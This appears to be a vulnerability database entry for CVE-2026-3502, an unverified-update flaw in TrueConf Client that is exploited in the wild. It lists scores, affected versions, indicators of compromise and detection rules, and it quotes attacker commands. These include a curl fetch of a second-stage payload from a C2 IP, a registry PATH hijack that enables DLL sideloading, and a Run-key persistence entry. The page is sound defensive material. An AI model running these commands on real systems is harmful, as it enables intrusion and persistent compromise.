cbcvebase.
CVE-2026-3502
published 2026-03-30

CVE-2026-3502: TrueConf Client downloads application update code and applies it without performing verification. An attacker who is able to influence the update delivery path…

PriorityP180high7.8CVSS 3.1
AVAACLPRHUIRSCCHIHAL
KEVITW
CISA Known Exploited Vulnerabilitydue 2026-04-16
Exploited in the wild
EPSS
5.75%
92.1th percentile
TrueConf Client downloads application update code and applies it without performing verification. An attacker who is able to influence the update delivery path can substitute a tampered update payload. If the payload is executed or installed by the updater, this may result in arbitrary code execution in the context of the updating process or user.

Affected

2 ranges
VendorProductVersion rangeFixed in
trueconftrueconf< 8.5.3.8848.5.3.884
trueconftrueconf_client

Detection & IOCsextracted from sources · hover to see the quote

hash22e32bcf113326e366ac480b077067cf
hash9b435ad985b733b64a6d5f39080f4ae0
hash248a4d7d4c48478dcbeade8f7dba80b3
ip43.134.90[.]60
ip43.134.52[.]221
ip47.237.15[.]197
filenametrueconf_windows_update.exe
filenameiscsiexe.dll
filename7z-x64.dll
pathC:\ProgramData\PowerISO\poweriso.exe
path%AppData%\Roaming\Adobe\update.7z
filenamerom.dat
registryHKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck
registryreg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\\appdata\local\temp" /f
commandtasklist > cache
commandtracert 8.8.8.8 -h 5
commandcurl -u ftpuser: ftp://47.237.15[.]197/update.7z -o
commandc:\program files\winrar\winrar.exe x update.7z -p
urlhttps://{trueconf_server}/downlods/trueconf_client.exe
pathC:\Program Files\TrueConf Server\ClientInstFiles\
pathc:\programdata\poweriso\
processiscsicpl.exe
filenametrueconf_windows_update.tmp
  • Detect UAC bypass via iscsicpl.exe executing from SysWOW64 with iscsiexe.dll sideloaded from %PATH% (TEMP directory)
  • Alert on registry persistence key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to C:\ProgramData\PowerISO\PowerISO.exe
  • Detect PATH hijacking via registry: reg add hkcu\environment setting PATH to C:\users\<user>\appdata\local\temp, used to force sideloading of iscsiexe.dll
  • Monitor outbound FTP connections to 47.237.15[.]197 with credentials 'ftpuser' fetching update.7z, indicative of second-stage payload retrieval
  • Flag network traffic to Havoc C2 IPs 43.134.90[.]60, 43.134.52[.]221, and 47.237.15[.]197 (Alibaba Cloud / Tencent hosted)
  • Detect reconnaissance commands tasklist > cache and tracert 8.8.8.8 -h 5 executed in context of TrueConf update process
  • Hunt for rom.dat artifact dropped alongside iscsiexe.dll as an indicator of the Havoc loader stage
  • ·Vulnerability only exploitable by an attacker who has already gained control of the on-premises TrueConf server; cloud-hosted deployments have a different trust boundary
  • ·The malicious update is delivered via the normal TrueConf update URL path; blocking or monitoring https://{trueconf_server}/downlods/trueconf_client.exe at the network level may help detect substitution
  • ·The update package on the server is stored at C:\Program Files\TrueConf Server\ClientInstFiles\ — integrity monitoring of this directory is recommended to detect tampering

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.